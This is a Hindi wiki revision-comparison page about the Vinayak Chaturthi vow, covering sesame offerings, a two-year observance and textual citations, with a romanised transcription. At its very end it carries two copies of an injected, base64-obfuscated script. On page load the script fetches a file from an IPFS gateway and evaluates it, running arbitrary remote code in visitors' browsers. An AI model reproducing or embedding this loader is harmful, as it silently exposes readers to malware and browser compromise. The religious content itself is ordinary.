Difference between revisions of "विनायक चतुर्थी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
Line 1: Line 1:
 +
[[चित्र:Ganesha.jpg|thumb|[[गणेश]]]]
 +
'''विनायक चतुर्थी व्रत''' [[चतुर्थी]] को करना चाहिए।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*यह व्रत [[चतुर्थी]] को करना चाहिए।
 
 
*इस दिन कर्ता तिल का भोजन दान करता है और स्वयं रात्रि में तिल का जल ग्रहण करता है।
 
*इस दिन कर्ता तिल का भोजन दान करता है और स्वयं रात्रि में तिल का जल ग्रहण करता है।
 
*यह दो वर्षों तक करना चाहिए।  
 
*यह दो वर्षों तक करना चाहिए।  
 
*कृत्यकल्पतरु और हेमाद्रि<ref>कृत्यकल्पतरु(व्रतखण्ड 79, [[भविष्य पुराण]] 1|22|1-2 का उद्धरण); हेमाद्रि (व्रतखण्ड 1, 519-520</ref> ने इसे [[गणेश चतुर्थी|गणपति चतुर्थी]] कहा है।<ref>धर्मशास्त्र खण्ड 4, गणेश चतुर्थी (गत अध्याय 8</ref>
 
*कृत्यकल्पतरु और हेमाद्रि<ref>कृत्यकल्पतरु(व्रतखण्ड 79, [[भविष्य पुराण]] 1|22|1-2 का उद्धरण); हेमाद्रि (व्रतखण्ड 1, 519-520</ref> ने इसे [[गणेश चतुर्थी|गणपति चतुर्थी]] कहा है।<ref>धर्मशास्त्र खण्ड 4, गणेश चतुर्थी (गत अध्याय 8</ref>
 
 
 
 
{{संदर्भ ग्रंथ}}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 12:44, 24 February 2013

[[chitr:Ganesha.jpg|thumb|ganesh]] vinayak chaturthi vrat chaturthi ko karana chahie.

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • is din karta til ka bhojan dan karata hai aur svayan ratri mean til ka jal grahan karata hai.
  • yah do varshoan tak karana chahie.
  • krityakalpataru aur hemadri[1] ne ise ganapati chaturthi kaha hai.[2]

 

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. krityakalpataru(vratakhand 79, bhavishy puran 1|22|1-2 ka uddharan); hemadri (vratakhand 1, 519-520
  2. dharmashastr khand 4, ganesh chaturthi (gat adhyay 8

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>